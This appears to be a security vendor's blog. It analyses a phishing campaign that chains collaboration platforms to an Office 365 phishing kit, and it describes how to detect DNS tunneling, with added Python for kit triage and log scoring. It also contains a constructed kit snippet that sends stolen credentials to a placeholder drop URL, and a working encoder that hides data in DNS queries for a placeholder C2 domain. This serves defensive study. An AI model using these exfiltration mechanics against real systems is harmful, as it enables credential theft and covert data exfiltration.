Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms

Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that attackers are increasingly turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here's what they're doing and how you (or your security vendor) can detect and stop these attacks.

Phishing Attacks Tap Collaboration Platforms

Phishing continues to be one of the most dangerous threats to organizations, both as an initial vector into the network and as a way to steal corporate credentials. We see, on average, 8,000 visits to phishing sites per month, all of which are blocked or logged by the Cato SASE Cloud (Figure 1).

Figure 1 – On average, we're seeing 8,000 entrances to phishing sites per month

Most phishing attacks rely on consumer email domains such as Gmail to make the message look like one more innocuous note from a familiar sender. Increasingly, though, we see compromised accounts on collaboration platforms such as Microsoft OneNote and ClickUp being used to host the URLs that lead to the phishing page. Collaboration platforms have, in effect, become another vehicle for distributing malware and phishing links.

Staying Under the Radar

The delivery stage of such an attack starts with an email sent from a compromised account at another organization, usually a known partner, so the message does not attract suspicion.
Because the mail comes from a real account, it looks legitimate. It is anything but. It typically contains a short social-engineering pretext and a link to a compromised OneNote or ClickUp page, which is hard for email security tools to flag because the link points at a trusted service. In the case illustrated below, the OneNote page even contains a look-alike "file" that is actually an image with a link that redirects the victim to what appears to be the Office 365 sign-in page. The attackers also keep spare compromised accounts so that the OneNote page can be swapped for another if the account in use is reset.

Figure 2 – The overall phishing attack flow starts with an "innocent" email (1) linking to a compromised account (2), such as OneNote, which redirects the victim to what looks like an Office 365 login page (3).

The phishing page itself is hosted on Glitch, a legitimate service normally used for web development. By chaining trusted services from delivery all the way to the final landing page, the criminals in this example kept the attack out of sight of most of the security tools organizations commonly deploy.

Phishing Kit Anatomy

These attacks are also distinctive in what happens after the victim submits credentials: the data is sent with an HTTP POST to a "drop URL" on a remote server. In most of the attacks we analyzed, the PHP drop file was named next.php or n.php. Fortunately, many of the operators never remove the phishing kit from the web server hosting the page.
By probing the site, you may find the kit itself sitting in an open directory, as in the Office 365 example below:

Figure 3 – Open directory listing contains phishing kit

With the kit in hand, it becomes possible to extract characteristics that can be turned into new ways of blocking phishing domains, which now routinely include collaboration platforms.

Phishing Kit Code Analysis

Going deeper, we dissected parts of the kit and found a few pieces of code worth noting. Phishing kits are usually sold on the Darknet for relatively low prices, and this one is built for buyers with no coding skills. In the PHP settings snippet (Figure 4), the "$recipient" variable is where the buyer puts the drop email address that will receive the captured credentials; the comment "Put your email address here" makes configuring the attack trivial.

Figure 4 – phishing kit code settings

The $finish_url variable is set to the official Office 365 site, so once credentials are submitted the victim is redirected to the real O365 page and has no reason to suspect they were phished.

Another interesting element is the authentication check. If the submitted credentials pass validation, the victim's information is base64-encoded and sent to a chosen URL. That URL is itself stored base64-encoded inside a base64_decode() call to obscure the destination. The URL serves as the kit's "database" file, collecting every victim's information.
Figure 5 – Authentication code snippet

As Figure 6 shows, what the kit exfiltrates is not only the victim's credentials but also the client IP, country, region and city.

Figure 6 – Exfiltrated information

We also analyzed other domains that use the same kit and found network characteristics that can be used to block the whole campaign. For example, once you submit credentials the server replies with the following body: {"signal":"ok","msg":"InValid Credentials"}. We observed the same response from different phishing domains running this kit. That behavior can be used to detect a user who has just entered credentials into one of these pages.

Attackers Are Able to Evade Phishing Solutions

While there are many solutions for detecting phishing, adversaries keep finding new techniques to evade them. Abusing trusted collaboration platforms is much more insidious than the familiar email-based attack that most security teams already know how to counter. As this analysis shows, though, by examining both the kit's code and its network attributes, IT teams can detect and stop these attacks.
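Two of the observations above lend themselves to code: the base64-obscured drop URL in the kit's settings, and the fixed JSON body the drop file returns. The Python below is an added example written for this page, not code from Cato or from the kit. The first function triages a recovered kit's PHP source (the sample source, the drop domain drop.example.net, the buyer address and the finish URL are all constructed); the second runs the network signature over constructed proxy records. The next.php/n.php file names and the response body come from the post; the assumption that the kit POSTs a base64-encoded form string is mine.

```python
"""Triage a recovered Office 365 phishing kit and hunt its traffic.

Added example for this post, not code from the post or from the kit.
Part 1 pulls the buyer-configured settings out of the kit's PHP source
($recipient, $finish_url) and decodes every base64_decode("...") literal,
which is where this kit hides its drop URL.
Part 2 scans HTTP proxy records for the kit's network signature: a POST to
one of the usual drop files (next.php, n.php) answered with the fixed body
{"signal":"ok","msg":"InValid Credentials"}, then decodes the POSTed data.
Everything below (PHP source, domains, log records) is constructed, and the
request body layout (base64 over a form string) is an assumption.
"""
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the kit's settings/authentication files. A real
# kit ships the base64 literal inline; it is computed here to keep the
# sample readable.
DROP_URL_B64 = base64.b64encode(b"https://drop.example.net/next.php").decode()
SAMPLE_KIT_PHP = r'''<?php
$recipient = "buyer@example.com";      // Put your email address here
$finish_url = "https://www.office.com/";
$db = base64_decode("__B64__");        // hidden drop URL
if ($valid) {
    $data = base64_encode($email . "|" . $pass . "|" . $ip . "|" . $country);
    file_get_contents($db . "?d=" . $data);
}
'''.replace("__B64__", DROP_URL_B64)

PHP_ASSIGN = re.compile(r'\$(recipient|finish_url)\s*=\s*["\']([^"\']*)["\']')
PHP_B64 = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def extract_kit_config(php_source):
    """Return the kit's drop email, finish URL and any decoded base64 literals."""
    cfg = dict(PHP_ASSIGN.findall(php_source))
    decoded = []
    for literal in PHP_B64.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            decoded.append(None)  # not clean base64 text; keep the slot
    cfg["decoded_literals"] = decoded
    cfg["drop_urls"] = [d for d in decoded if d and d.startswith(("http://", "https://"))]
    return cfg


KIT_RESPONSE = {"signal": "ok", "msg": "InValid Credentials"}
DROP_FILES = {"next.php", "n.php"}


def decode_submission(body):
    """Decode the POSTed blob (assumed: base64 over a URL-encoded form)."""
    try:
        raw = base64.b64decode(body, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return {}
    return {k: v[0] for k, v in parse_qs(raw).items()}


def find_kit_submissions(transactions):
    """Return one hit per proxy record that matches the kit's network signature."""
    hits = []
    for tx in transactions:
        # Match on the file name, not a suffix: "login.php".endswith("n.php") is True.
        filename = urlsplit(tx["url"]).path.rsplit("/", 1)[-1]
        if tx["method"] != "POST" or filename not in DROP_FILES:
            continue
        try:
            body = json.loads(tx["response_body"])
        except ValueError:
            continue
        if body != KIT_RESPONSE:      # exact body is the strong part of the signature
            continue
        hits.append({"client": tx["client"], "url": tx["url"],
                     "fields": decode_submission(tx.get("request_body", ""))})
    return hits


# Constructed proxy records: one real kit submission among look-alikes.
SAMPLE_TRANSACTIONS = [
    {"client": "10.0.0.5", "method": "GET", "url": "https://login.microsoftonline.com/",
     "request_body": "", "response_body": "<html>...</html>"},
    {"client": "10.0.0.5", "method": "POST", "url": "https://drop.example.net/next.php",
     "request_body": base64.b64encode(
         b"email=victim%40corp.example&pass=Spring2021%21&ip=203.0.113.7&country=US").decode(),
     "response_body": '{"signal":"ok","msg":"InValid Credentials"}'},
    {"client": "10.0.0.9", "method": "POST", "url": "https://intranet.corp.example/login.php",
     "request_body": "user=a&pass=b", "response_body": '{"signal":"ok"}'},
    {"client": "10.0.0.12", "method": "POST", "url": "https://cdn.example.org/n.php",
     "request_body": "x=1", "response_body": '{"status":"ok"}'},
]

if __name__ == "__main__":
    print(extract_kit_config(SAMPLE_KIT_PHP))
    for hit in find_kit_submissions(SAMPLE_TRANSACTIONS):
        print(hit)
```

The file name alone is a weak indicator (plenty of benign sites have an n.php), which is why the rule requires the exact response body as well; in a proxy or SASE pipeline the same two conditions can be expressed as a content rule on the response. The decoded fields are what you would expect to find at the drop URL, and they tell the responder exactly which account to reset first.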

How to Detect DNS Tunneling in the Network?

In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam that infects victims with malware by getting them to call a phony call center. BazarCall can lead to the Anchor malware, which uses DNS tunneling to communicate with its C2 servers. APT groups have also used DNS tunneling in a malware campaign targeting government organizations in the Middle East. Here we present a few techniques you can use to detect DNS tunneling in your network.

DNS Tunneling in a Nutshell

So how do attackers use DNS tunneling in their malware? It's simple. First, they register a domain and point its authoritative name server at a server they control, which acts as the C2 server. Next, the malware on the infected host encodes its data into DNS queries for names under that domain and sends them to the local DNS resolver. The resolver, following the normal delegation chain, forwards each query to the attacker's authoritative server, which decodes the data and can carry commands back in the response. The result is a two-way channel between the C2 server and the infected host that never leaves the DNS protocol. For attackers, DNS tunneling is a convenient way to exfiltrate data and maintain access because outbound DNS is rarely blocked. At the same time, DNS tunneling has very distinct network markers that you can use to detect it on your network.

DNS Tunneling to Any Device

In terms of network markers, TXT queries are very common in DNS tunneling, but tunnels can also use uncommon query types such as type 10 (NULL). To detect DNS tunneling in your network you need to look for long DNS queries and uncommon query types, distinguish legitimate security products such as antivirus (which also issue unusual-looking DNS lookups) from malicious traffic, and distinguish human-generated DNS traffic from bot-generated traffic.
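To make the "nutshell" above concrete, here is an added example (not the post's code and not any particular malware family's encoding) of how an implant packs data into query names and how the attacker's authoritative server for the assumed domain c2.example reassembles it. It also shows where 63-character labels, like the ones analyzed in the next section, come from: 63 bytes is the maximum DNS label length and 253 the maximum name length, so an encoder that fills labels produces exactly that pattern.

```python
"""How data rides inside DNS query names (the mechanism behind the post).

Added example; not the post's code and not any specific malware's scheme.
The implant base32-encodes a payload, splits it into labels of at most 63
bytes (the DNS label limit), prefixes a hex sequence number, and appends the
attacker's domain. The resolver forwards every such query to that domain's
authoritative server, which the attacker runs, so decode_chunks() is the
C2 side reassembling the data. The domain c2.example is an assumption.
"""
import base64

C2_DOMAIN = "c2.example"   # assumed attacker domain; its NS record points at the C2 server
MAX_LABEL = 63             # RFC 1035 label limit
MAX_NAME = 253             # RFC 1035 name limit (text form)
LABELS_PER_QUERY = 3       # 3 x 63 payload chars per query keeps every name under MAX_NAME


def encode_chunks(data, c2_domain=C2_DOMAIN):
    """Return the query names that carry `data` to c2_domain, in order."""
    # base32 survives DNS case folding; padding is dropped and restored on decode
    text = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(text), per_query)):
        chunk = text[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, c2_domain])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError("query name exceeds DNS limits")
        names.append(name)
    return names


def decode_chunks(names, c2_domain=C2_DOMAIN):
    """C2 side: reassemble the payload from the names it was asked about."""
    suffix = "." + c2_domain
    parts = {}
    for name in names:
        lowered = name.lower()
        if not lowered.endswith(suffix):
            continue          # unrelated query; a real authoritative server sees those too
        labels = lowered[:-len(suffix)].split(".")
        parts[int(labels[0], 16)] = "".join(labels[1:])
    # queries may arrive out of order; the sequence label restores it
    text = "".join(parts[k] for k in sorted(parts)).upper()
    text += "=" * (-len(text) % 8)
    return base64.b32decode(text)


# Constructed payload: 240 bytes, which needs three queries at 189 chars each.
SAMPLE_PAYLOAD = b"whoami: jdoe\nhostname: LAB-PC\n" * 8

if __name__ == "__main__":
    queries = encode_chunks(SAMPLE_PAYLOAD)
    for q in queries:
        print(len(q), [len(l) for l in q.split(".")], q[:40] + "...")
    assert decode_chunks(queries) == SAMPLE_PAYLOAD
```

Run it and look at the label lengths it prints: every full query has the same template (a short sequence label, three 63-character labels, the domain), which is the "same algorithm repeated in different DNS queries" that the next section uses as an indicator. The query type is irrelevant to the encoding; TXT or NULL is chosen for the response direction, where a larger record carries more data back to the implant.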
In the following example, we analyze the algorithm behind DNS tunneling traffic seen in our customers' networks. We have seen many cases of DNS tunneling on Windows; in this example, though, the infected device was running Android.

Examine the Algorithm Generating the DNS Queries

We have seen a few common characteristics in the DNS queries generated by Android DNS tunneling cases. In Figure 1 we can see the same algorithm used in multiple DNS queries. We have broken each query name into five parts:

- There are 4-11 characters in the first part (red)
- The first 6 characters of the second part are repeated between different queries (blue)
- There are 63 characters in each of the next parts (yellow)
- The last section has 10 characters (black)
- The first letter of the second part is repeated with a unified string (green)

Figure 1 - DNS tunneling example

Because every query follows the same algorithm, we can conclude that they originate from the same bot. The uniform, repeated structure is itself evidence of bot traffic: bot-generated traffic tends to be consistent and uniform, while human-driven lookups are not.

Examine the Destination

Next, we examine the destination of the DNS queries. Doing so, we identified several unknown servers. When we looked at what other DNS queries those servers received, we found none apart from the tunneling queries. If you cannot find any legitimate traffic to a DNS server, that is another indicator that the server may be used by malware.

Examine the Popularity

Given a sufficiently large network, an algorithm that measures the popularity of an IP or domain among your users will also help hunt malware.
Using such a popularity algorithm across the hundreds of thousands of users on the Cato network, we can see that the popularity of the servers in these DNS queries is low. Low popularity of an IP is often an indicator of a malicious server, because the server may only be used by the malware. Low popularity alone, however, is insufficient to label a site malicious. It must be combined with other indicators, such as the ones outlined above.

Conclusion

DNS tunneling is an old technique that lets attackers communicate with C2 servers and exfiltrate data through many firewalls. Focusing on the network characteristics, though, allows the threat to be identified. In our case, we found multiple DNS queries generated by one algorithm, a destination made up of unknown servers, and servers that were unpopular. Any one indicator alone may not reflect malicious communication, but together they make it highly probable that the session is malicious, a conclusion we validated through manual investigation. It is an excellent example of how combining networking and security information leads to better threat detection.
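The three checks in this post (a repeated generating algorithm, a destination that sees no other traffic, low popularity), together with the long-name and uncommon-query-type markers from its opening, combined into one scoring pass over a DNS query log. This is an added example, not Cato's detection logic. The log is constructed with a seeded random generator, the domains c2-tunnel.example, av-vendor.example, example.org and example.net are made up, and the thresholds are starting points to tune on your own data. The antivirus case is there to show why uniform, TXT-heavy traffic on its own is not enough: what separates the tunnel is that it is also long, unpopular and the only traffic its domain ever receives.

```python
"""Score DNS query logs for the tunneling indicators described in the post.

Added example, not the post's detection code. Per registrable domain
(approximated as the last two labels; a real implementation should use the
public suffix list) it checks:
  long_names         most queries longer than LONG_NAME characters
  uncommon_qtype     most queries are TXT or NULL (type 10)
  machine_generated  many distinct names that all share one label-length shape
  no_ordinary        the domain never receives a short A/AAAA lookup
  low_popularity     fewer than POPULARITY_FLOOR distinct clients query it
The log is constructed with a seeded RNG; every domain in it is made up.
"""
import random
import string
from collections import Counter, defaultdict

UNCOMMON_QTYPES = {"TXT", "NULL"}
LONG_NAME = 100          # characters; typical browsing names are far shorter
POPULARITY_FLOOR = 3     # distinct clients; raise this on a large network
ALERT_THRESHOLD = 4      # indicators out of five
ALPHABET = string.ascii_lowercase + string.digits


def _rand(rng, n):
    return "".join(rng.choice(ALPHABET) for _ in range(n))


def build_sample_log():
    """Constructed (client, qname, qtype) records covering four cases."""
    rng = random.Random(7)
    log = []
    # 1. One infected host. Names follow the shape from the post's Figure 1:
    #    4-11 chars, a part with a fixed 6-char prefix, two 63-char parts, 10 chars.
    for _ in range(40):
        name = ".".join([_rand(rng, rng.randint(4, 11)), "xq7m2a" + _rand(rng, 16),
                         _rand(rng, 63), _rand(rng, 63), _rand(rng, 10), "c2-tunnel.example"])
        log.append(("10.1.4.23", name, "TXT"))
    # 2. Antivirus reputation lookups: also uniform and TXT, but short, from
    #    many clients, and next to ordinary A queries for the vendor domain.
    for i in range(50):
        log.append((f"10.1.0.{i + 1}", _rand(rng, 32) + ".lookup.av-vendor.example", "TXT"))
    for i in range(10):
        log.append((f"10.1.0.{i + 1}", "update.av-vendor.example", "A"))
    # 3. Ordinary browsing.
    for i in range(30):
        log.append((f"10.1.0.{i + 1}", "www.example.org", "A"))
    for i in range(20):
        log.append((f"10.1.0.{i + 1}", "mail.example.org", "A"))
    # 4. A mail server doing a few SPF (TXT) lookups: unpopular and TXT-only,
    #    yet benign; it must not trip the alert on its own.
    for _ in range(3):
        log.append(("10.1.9.2", "partner-mail.example.net", "TXT"))
    return log


def registrable_domain(qname):
    return ".".join(qname.rstrip(".").split(".")[-2:])


def shape(qname):
    """Label-length template, ignoring the variable-length first label."""
    return tuple(len(label) for label in qname.split(".")[1:])


def score_domains(log):
    """Return {domain: {"score", "indicators", "queries", "clients"}}."""
    per_domain = defaultdict(list)
    for client, qname, qtype in log:
        per_domain[registrable_domain(qname)].append((client, qname, qtype))
    results = {}
    for domain, qs in per_domain.items():
        n = len(qs)
        names = [q for _, q, _ in qs]
        types = [t for _, _, t in qs]
        clients = {c for c, _, _ in qs}
        dominant = Counter(map(shape, names)).most_common(1)[0][1] / n
        indicators = {
            "long_names": sum(len(q) > LONG_NAME for q in names) / n > 0.5,
            "uncommon_qtype": sum(t in UNCOMMON_QTYPES for t in types) / n > 0.5,
            # "same algorithm": names almost never repeat, yet share one shape
            "machine_generated": n >= 10 and len(set(names)) / n > 0.8 and dominant > 0.8,
            # "no other traffic to the server": never a plain short A/AAAA lookup
            "no_ordinary": not any(t in ("A", "AAAA") and len(q) < 40
                                   for q, t in zip(names, types)),
            "low_popularity": len(clients) < POPULARITY_FLOOR,
        }
        results[domain] = {"score": sum(indicators.values()), "indicators": indicators,
                           "queries": n, "clients": len(clients)}
    return results


def suspicious_domains(log):
    return sorted(d for d, r in score_domains(log).items() if r["score"] >= ALERT_THRESHOLD)


if __name__ == "__main__":
    for domain, r in sorted(score_domains(build_sample_log()).items()):
        print(f"{domain:22} score={r['score']} clients={r['clients']} {r['indicators']}")
    print("suspicious:", suspicious_domains(build_sample_log()))
```

On the constructed log the tunnel domain scores 5 of 5, the antivirus domain 2 (uniform and TXT, but popular, short and mixed with ordinary lookups), the browsing domain 0, and the mail server's SPF lookups 3 (TXT-only, unpopular, no A records) which stays below the alert line. That last case is the post's point about popularity: on its own it is noise, and only the combination of indicators gives a high-confidence detection.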